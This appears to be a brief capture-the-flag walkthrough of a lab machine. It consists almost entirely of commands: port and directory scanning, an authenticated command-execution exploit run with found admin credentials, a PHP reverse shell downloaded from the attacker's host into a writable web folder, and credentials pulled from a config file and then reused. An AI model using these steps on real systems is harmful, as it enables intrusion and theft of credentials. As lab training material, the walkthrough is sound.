nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Username: admin
Password: OllieUnixMontgomery!
python3 exploit.py -usr admin -pwd OllieUnixMontgomery! -cmd 'whoami' -url http://$VICTIM
We can run commands from the browser as well.
git clone https://github.com/pentestmonkey/php-reverse-shell
cd php-reverse-shell
subl php-reverse-shell.php
python2 -m SimpleHTTPServer 81
We have access to write to the immaolllieeboyyy directory so we put our shell there.
wget http://$KALI:81/php-reverse-shell.php -O immaolllieeboyyy/test.php
http://VICTIM:/immaolllieeboyyy/test.php
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
cd /var/www/html
grep -ir "pass" config.php -A4 -B4
mysql -uphpipam_ollie -pIamDah1337estHackerDog!
su ollie
Password: OllieUnixMontgomery!
wget http://$KALI:81/pspy32
chmod +x pspy32
./pspy32
cd /tmp/
wget http://10.10.231.159:81/pspy32
chmod +x pspy32
./pspy32
find / -name "feedme" 2>/dev/null